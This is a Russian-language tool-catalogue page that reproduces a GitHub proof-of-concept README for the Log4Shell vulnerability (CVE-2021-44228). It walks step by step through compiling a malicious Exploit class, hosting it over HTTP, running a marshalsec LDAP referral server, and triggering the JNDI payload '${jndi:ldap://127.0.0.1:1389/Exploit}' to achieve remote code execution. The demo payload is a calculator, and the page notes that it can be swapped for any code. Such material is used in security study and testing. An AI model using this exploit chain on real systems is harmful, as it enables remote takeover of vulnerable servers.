Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/coldfusionx/cve-2021-44228-log4shell-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubcoldfusionx/cve-2021-44228-log4shell-poc

CVE-2021-44228-Log4Shell-POC

Proof-of-concept для Log4Shell (CVE-2021-44228), демонстрирующий удалённое выполнение кода на основе JNDI через LDAP- и HTTP-серверы.

Репозиторий
214 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-44228-Log4Shell-POC

Полный POC для печально известного Log4j CVE-2021-44228

Предварительные требования

  • Скачайте и установите Java отсюда, можно использовать jdk-8u181.
  • Установите IntelliJ Idea отсюда

POC

  • Шаг 1 : Клонируйте этот репозиторий.
  • Шаг 2 : Переместите файл Exploit.java в отдельную папку. Например, в моём случае я создал папку rce в домашнем каталоге. /home/coldfusionx/rce

mov

  • Шаг 3 : Взглянем на Exploit.java Здесь вы можете изменить удалённый код на любой другой, в данном случае на машине с Ubuntu появится .
gnome-calculator

exp

  • Шаг 4 : Далее нам нужно скомпилировать Exploit.java с помощью команды javac Exploit.java, после успешной компиляции мы должны увидеть, что создан новый файл Exploit.class.

com

  • Шаг 5 : Запустите python http сервер для размещения Exploit.class с помощью python3 -m http.server 8888, в качестве альтернативы вы также можете использовать php сервер с помощью команды php -S 127.0.0.1:8888.

sv

  • Шаг 6 : Загрузите файлы проекта в IntelliJ Idea и дайте maven завершить индексацию файлов. После завершения ваш проект должен выглядеть так :

poc1

  • Шаг 7 : Для запуска проекта нам нужно создать конфигурацию, нажмите на Add Configuration

poc2

root@kitploit:~
1. Выберите `Application`

poc3

root@kitploit:~
2. Выберите главный класс

main

root@kitploit:~
3. Выберите JDK и примените.

poc4

root@kitploit:~
4. Вы должны увидеть созданное приложение Log4j Applicaton, готовое к запуску.

poc5

  • Шаг 8 : Далее мы запускаем LDAPRefServer с помощью marshalsec :
  • cd marshasec
  • Выполните java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit" для запуска LDAP сервера, здесь 127.0.0.1:8888 — это python сервер, размещающий Exploit.class, поэтому мы указываем /#Exploit

ldap

  • Шаг 9 : Отредактируйте JNDI payload в log4j.java в соответствии с вашими требованиями, logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}"); В данном случае мы загружаем удалённый класс Exploit, LDAP реферер сервер перенаправит запрос на наш python сервер, размещающий вредоносный класс Exploit.

  • Шаг 10 : Запустите Log4j, при успешном запуске вы должны увидеть всплывающий gnome calculator.

rce

Ознакомьтесь с моим подробным анализом Log4Shell CVE-2021-44228

Ссылка

  • https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Скачать инструмент